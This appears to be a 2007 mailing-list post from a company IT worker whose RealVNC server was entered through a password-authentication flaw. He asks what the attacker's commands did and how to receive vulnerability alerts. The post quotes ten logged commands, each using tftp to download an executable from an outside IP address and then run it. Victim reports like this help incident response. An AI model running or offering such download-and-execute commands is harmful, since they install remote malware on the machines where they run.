my realvnc was hacked
Information Technology Dpt. Crafta
it "at" crafta.com
Sat Feb 10 01:48:00 2007
Hi, I was a victim of the "The vulnerability is caused due to an error
within the handling of VNC password authentication requests."
This is my official note of the case:
http://www.tek-tips.com/viewthread.cfm?qid=1330302&page=1
This is the short explanation of what is that RealVNC vulnerability:
http://secunia.com/advisories/20107/
I have two questions:
1- Someone introduced without password to my realvnc server and executed
these commands:
%comspec% /c tftp -i 69.120.95.217 GET krqqr.exe & start krqqr
%comspec% /c tftp -i 69.120.95.217 GET khtv.exe & start khtv
%comspec% /c tftp -i 83.226.184.184 GET bjgpbrwf.exe & start bjgpbrwf
%comspec% /c tftp -i 83.226.184.184 GET dnyxl.exe & start dnyxl
%comspec% /c tftp -i 83.226.184.184 GET xixy.exe & start xixy
%comspec% /c tftp -i 83.226.184.184 GET cavm.exe & start cavm
%comspec% /c tftp -i 83.226.184.184 GET srsf.exe & start srsf
%comspec% /c tftp -i 83.226.184.184 GET odihiz.exe & start odihiz
%comspec% /c tftp -i 24.205.47.33 GET ltahq.exe & start ltahq
%comspec% /c tftp -i 24.205.47.33 GET jalqi.exe & start jalqi
Does anyone knows what the hack are those?
2.- How can I be notified by email of the RealVNC vulnerabilities in
order do better secure practices?
Thanks in advance
ALDO